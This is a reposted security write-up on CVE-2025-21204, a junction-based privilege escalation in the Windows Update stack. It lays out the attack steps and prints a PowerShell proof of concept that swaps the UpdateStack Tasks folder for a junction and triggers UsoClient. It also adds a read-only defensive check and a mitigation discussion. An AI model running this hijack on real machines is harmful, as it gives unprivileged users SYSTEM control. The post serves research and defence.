CVE-2025-21204: Privilege escalation through improper link following in the Windows Update stack

admin, 19 April 2025 00:22:03

URL

  • https://cyberdom.blog/abusing-the-windows-update-stack-to-gain-system-access-cve-2025-21204/

Target

Windows systems running the update stack from before the April 2025 update

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21204/

Explanation

CVE-2025-21204 is a local privilege escalation vulnerability in the Windows Update stack. During an update, a process running with SYSTEM privileges (for example MoUsoCoreWorker.exe or UsoClient.exe) executes scripts or binaries located under C:\ProgramData\Microsoft\UpdateStack\Tasks. If the permissions on that folder are set incorrectly, an attacker can delete it and replace it with a junction that points to a folder holding their own payload, and the update process then follows the link into attacker-controlled content. Privilege escalation proceeds as follows.

  1. Place a payload (for example a PowerShell script) at a path the attacker controls.

  2. Delete C:\ProgramData\Microsoft\UpdateStack\Tasks and replace it with a junction that points to the path holding the payload from step 1.

  3. Cause processes such as UsoClient.exe, MoUsoCoreWorker.exe and TiWorker.exe to be spawned, either via a scheduled task or by triggering an update directly.

  4. Privilege escalation occurs when the spawned SYSTEM process executes the payload.

Below is a PoC written in PowerShell that demonstrates this behaviour: it stages the junction, triggers the update stack and then checks whether a file was touched with SYSTEM privileges, which would confirm the escalation.

<#
.SYNOPSIS
    CVE-2025-21204 exploit simulation for non-admin users via junction-based path hijack.
.DESCRIPTION
    Drops a bait payload in a user-controlled directory, creates a junction to hijack the Update Stack path,
    and triggers the update process to test if SYSTEM accesses the payload.
    The script provides the PoC that allows running these actions.
.AUTHOR
    Elli Shlomo
#>

# Paths
$trapPath            = "$env:APPDATA\Microsoft\UpdateStack\Tasks"
$updateStackRealPath = "C:\ProgramData\Microsoft\UpdateStack\Tasks"
$payloadPath         = "$trapPath\UpdateStackAgent.dll"
$proofPath           = "C:\Users\Public\cve2025-proof.log"
$logPath             = "$env:APPDATA\CVE2025\simulation.log"
$evidencePath        = "$env:APPDATA\CVE2025\evidence.txt"
$verdictPath         = "$env:APPDATA\CVE2025\vulnerable.txt"
$verboseLog          = "$env:TEMP\cve2025-verbose.log"

# Intro
Write-Host "`n[*] CVE-2025-21204 Exploit Simulation (Non-Admin)"
Write-Host "[*] Trap directory     : $trapPath"
Write-Host "[*] Payload DLL path   : $payloadPath"
Write-Host "[*] SYSTEM proof file  : $proofPath"
Write-Host "[*] Simulation log     : $logPath"
Write-Host "[*] Evidence file      : $evidencePath"
Write-Host "[*] Verdict result     : $verdictPath"
Write-Host "[*] Verbose transcript : $verboseLog`n"

# Start transcript
Start-Transcript -Path $verboseLog -Force

# Ensure directories exist
Write-Host "[*] Creating necessary directories..."
New-Item -Path $trapPath -ItemType Directory -Force -ErrorAction SilentlyContinue | Out-Null
New-Item -Path (Split-Path $logPath) -ItemType Directory -Force -ErrorAction SilentlyContinue | Out-Null
Write-Host "[+] Directories ready.`n"

# Payload content (bait: a text marker with a .dll name, not a real DLL)
$payload = @"
Payload executed by SYSTEM at: $(Get-Date)
"@

# Write bait payload
Write-Host "[*] Writing payload to: $payloadPath"
$payload | Out-File -FilePath $payloadPath -Encoding ASCII
$payload | Out-File -FilePath $proofPath -Append
Write-Host "[+] Payload written.`n"

# Simulation metadata log
$log = @"
CVE-2025-21204 Exploit Simulation
-------------------------------------
Date         : $(Get-Date)
Payload File : $payloadPath
Hijack Path  : $updateStackRealPath
Proof File   : $proofPath
"@
Set-Content -Path $logPath -Value $log -Encoding UTF8 -Force
Write-Host "[+] Simulation metadata saved.`n"

# Attempt junction creation (non-admin safe). mklink /J needs no privilege, but it only succeeds
# if the real path is absent; a failed mklink does not raise a terminating error here, so read its output.
Write-Host "[*] Attempting junction (no admin)..."
if (-not (Test-Path $updateStackRealPath)) {
    try {
        Start-Process -FilePath "cmd.exe" -ArgumentList "/c mklink /J `"$updateStackRealPath`" `"$trapPath`"" -NoNewWindow -Wait
        Write-Host "[+] Junction created: $updateStackRealPath -> $trapPath"
    } catch {
        Write-Host "[-] Failed to create junction: $_"
    }
} else {
    Write-Host "[!] Target path already exists: $updateStackRealPath"
    Write-Host "[-] Cannot create junction unless folder is removed by SYSTEM update cleanup."
}
Write-Host ""

# Trigger update
Write-Host "[*] Triggering UsoClient.exe (StartScan)..."
try {
    Start-Process UsoClient.exe -ArgumentList StartScan -WindowStyle Hidden
    Write-Host "[+] UsoClient.exe started.`n"
} catch {
    Write-Host "[-] Failed to trigger UsoClient.exe: $_"
}

# Monitor for SYSTEM process
Write-Host "[*] Monitoring for SYSTEM process MoUsoCoreWorker.exe..."
$found = $false
for ($i = 1; $i -le 6; $i++) {
    Start-Sleep -Seconds 5
    Write-Host "[=] Attempt ${i}: Checking..."
    if (Get-Process -Name "MoUsoCoreWorker" -ErrorAction SilentlyContinue) {
        Write-Host "[!] SYSTEM process detected: MoUsoCoreWorker.exe"
        $found = $true
        break
    }
}
Start-Sleep -Seconds 5

# Check for success. The proof file was pre-created above under the current user, so its mere presence
# proves nothing; only an owner of NT AUTHORITY\SYSTEM indicates the update process created it.
Write-Host "`n[*] Analyzing payload execution..."
if (Test-Path $proofPath) {
    $owner     = (Get-Acl $proofPath).Owner
    $timestamp = (Get-Item $proofPath).LastWriteTime
    if ($owner -match '\\SYSTEM$') {
        $details = @"
[+] Exploit successful
Payload executed as: $owner
Last Modified: $timestamp
"@
        Set-Content -Path $verdictPath -Value $true
        Write-Host "[✓] SUCCESS: SYSTEM likely accessed the payload."
    } else {
        $details = @"
[!] Exploit not confirmed
Proof file exists but is owned by: $owner
Last Modified: $timestamp
"@
        Set-Content -Path $verdictPath -Value $false
        Write-Host "[✗] FAILURE: Proof file is owned by $owner, not SYSTEM."
    }
} else {
    $details = @"
[!] Exploit failed
No proof file found.
Time: $(Get-Date)
"@
    Set-Content -Path $verdictPath -Value $false
    Write-Host "[✗] FAILURE: Payload was not executed by SYSTEM."
}

# Save evidence
Set-Content -Path $evidencePath -Value $details -Encoding UTF8
Write-Host "[*] Forensic evidence saved: $evidencePath"

# End
Stop-Transcript
Write-Host "`n[✓] Simulation complete. See verbose log: $verboseLog`n"

In the April 2025 update that patches this vulnerability, Microsoft also pre-creates the C:\inetpub folder with a default ACL as a mitigation against this class of attack: a folder that the update process may later use is created in advance with restrictive permissions, so it cannot be replaced with a link by an unprivileged user.
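As an added example (not from the original post or from the PoC author), the read-only PowerShell check below lets a defender verify on a host the two conditions discussed above: whether the update-stack task directory is currently a junction rather than a real directory and whether a low-privilege principal holds delete or write rights on it or its parent (the precondition for the swap), and whether the C:\inetpub folder that the April 2025 update pre-creates is present and not writable by such principals. It assumes the path C:\ProgramData\Microsoft\UpdateStack\Tasks named above; the list of low-privilege principals and the "dangerous rights" mask are this example's own choices, not something the page or Microsoft specifies.

```powershell
# Added example, not from the original post: read-only precondition/mitigation check for CVE-2025-21204.
# Run as a standard user on the host under test. It creates no files, junctions or processes.
# Assumes the task directory named in the write-up and the C:\inetpub folder pre-created by the April 2025 update.

$targetPath  = 'C:\ProgramData\Microsoft\UpdateStack\Tasks'
$inetpubPath = Join-Path $env:SystemDrive 'inetpub'

# Low-privilege principals chosen for this example. Write/delete rights for any of them on the
# parent directory let a normal user remove the folder and plant a junction in its place.
$lowPrivPrincipals = @(
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'Everyone',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that allow removing a directory or creating a reparse point in its place (example's own mask).
$fsr = [System.Security.AccessControl.FileSystemRights]
$dangerousRights = $fsr::Delete -bor $fsr::DeleteSubdirectoriesAndFiles -bor
                   $fsr::CreateDirectories -bor $fsr::Write -bor $fsr::Modify -bor $fsr::FullControl

function Get-WeakAce {
    # Returns the Allow ACEs on $Path that grant any bit of $dangerousRights to a low-privilege principal.
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return @() }
    $acl = Get-Acl -LiteralPath $Path
    @($acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $lowPrivPrincipals -contains $_.IdentityReference.Value -and
        (([int]$_.FileSystemRights) -band ([int]$dangerousRights)) -ne 0
    })
}

function Get-LinkInfo {
    # Reports whether $Path is a reparse point (junction or symlink) and where it points.
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $null }
    $item = Get-Item -LiteralPath $Path -Force
    $isReparse = (($item.Attributes -band [System.IO.FileAttributes]::ReparsePoint) -ne 0)
    [pscustomobject]@{
        Path           = $Path
        IsReparsePoint = $isReparse
        LinkType       = $item.LinkType                     # 'Junction', 'SymbolicLink' or empty
        Target         = $(if ($isReparse) { $item.Target } else { $null })
    }
}

function Show-AclFindings {
    # Prints the weak ACEs on $Path, if any.
    param([Parameter(Mandatory)][string]$Path)
    $weak = @(Get-WeakAce -Path $Path)
    if (-not (Test-Path -LiteralPath $Path)) {
        Write-Host "[-] $Path does not exist."
    } elseif ($weak.Count -gt 0) {
        Write-Host "[!] $Path grants write/delete rights to low-privilege principals:"
        $weak | ForEach-Object { Write-Host ("      {0} : {1}" -f $_.IdentityReference, $_.FileSystemRights) }
    } else {
        Write-Host "[+] $Path : no write/delete ACEs for low-privilege principals."
    }
}

# 1. Is the task directory a real directory, or has it already been swapped for a junction?
Write-Host "[*] Checking $targetPath"
$link = Get-LinkInfo -Path $targetPath
if ($null -eq $link) {
    Write-Host "[!] Directory is absent; whoever creates it first (possibly a normal user) controls it."
} elseif ($link.IsReparsePoint) {
    Write-Host "[!] Path is a $($link.LinkType) pointing to $($link.Target); a real directory is expected here."
} else {
    Write-Host "[+] Path is a real directory."
}

# 2. Can a normal user delete the directory (parent ACL) or write into it (its own ACL)?
Show-AclFindings -Path (Split-Path -Path $targetPath -Parent)
Show-AclFindings -Path $targetPath

# 3. Mitigation indicator: the April 2025 update pre-creates C:\inetpub with a default ACL.
if (Test-Path -LiteralPath $inetpubPath) {
    $ip = Get-LinkInfo -Path $inetpubPath
    if ($ip.IsReparsePoint) {
        Write-Host "[!] $inetpubPath is a $($ip.LinkType) -> $($ip.Target), not a real directory."
    }
    Show-AclFindings -Path $inetpubPath
} else {
    Write-Host "[-] $inetpubPath is absent: the April 2025 update may not be installed, or the folder was removed afterwards."
}
```

A "[!]" on the parent directory is the finding that matters for step 2 of the procedure above: deleting the Tasks folder and recreating it as a junction needs delete rights on the folder plus create-directory rights on its parent, and a real, SYSTEM-owned directory with no such ACEs cannot be swapped by a standard user. The inetpub check is only an indicator that the April 2025 changes are in place; confirm patch level through installed updates rather than the folder alone.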

PoC
https://raw.githubusercontent.com/eshlomo1/CloudSec/refs/heads/main/Attacking%20the%20Cloud/CVE-2025-21204/Exploit-CVE2025-UpdateStackLPE-NonAdmin.ps1

Originally published on the WeChat official account Ots安全: CVE-2025-21204: Privilege escalation through improper link following in the Windows Update stack

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability; this site assumes no legal or joint liability. For questions, contact us by e-mail (use a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).
  • When reposting, keep this link (CN-SEC Chinese Net; thanks to the original author for their work): https://cn-sec.com/archives/3976422.html
